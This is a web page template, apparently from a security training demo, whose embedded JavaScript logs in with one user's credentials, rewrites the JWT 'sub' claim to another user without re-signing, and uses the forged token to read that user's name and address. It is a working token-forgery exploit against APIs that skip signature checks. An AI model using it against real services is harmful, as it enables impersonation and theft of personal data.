{{#section 'head'}}

    <script>
        window.API_BASE_URL = '/jwt/v1';
    </script>

    <script>
        const apiBaseUrl = window.API_BASE_URL;
        const targetUserName = 'johndoe';

        fetch(`${apiBaseUrl}/tokens`, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                username: 'foobar',
                password: '123456'
            })
        })
                .then((response) => response.json())
                .then((data) => {

                    let token = data.token;

                    let [b64Alg, b64TokenData, b64Signature] = token.split('.');

                    let tokenData = JSON.parse(atob(b64TokenData));

                    tokenData.sub = targetUserName;

                    b64TokenData = btoa(JSON.stringify(tokenData)).replace(/=/g, '');

                    token = [b64Alg, b64TokenData, b64Signature].join('.');

                    return fetch(`${apiBaseUrl}/users/${targetUserName}`, {
                        headers: {
                            'Authorization': `Bearer ${token}`
                        }
                    });

                })
                .then((response) => response.json())
                .then((data) => {

                    let outputElement = document.querySelector('#wt-output');
                    outputElement.innerHTML = `
                    <div>
                        <span>Name: </span>
                        <span class="wt-firstname"></span>
                        <span class="wt-lastname"></span>
                    </div>
                    <div>
                        <span>Address: </span>
                        <span class="wt-address"></span>
                    </div>
                    `;

                    outputElement.querySelector('.wt-firstname').textContent = data.firstName;
                    outputElement.querySelector('.wt-lastname').textContent = data.lastName;
                    outputElement.querySelector('.wt-address').textContent = data.address;

                });

    </script>

{{/section}}

<p>Using Foo BAR's credentials to get a JWT that we forge as John DOE's token.</p>

<div id="wt-output"></div>
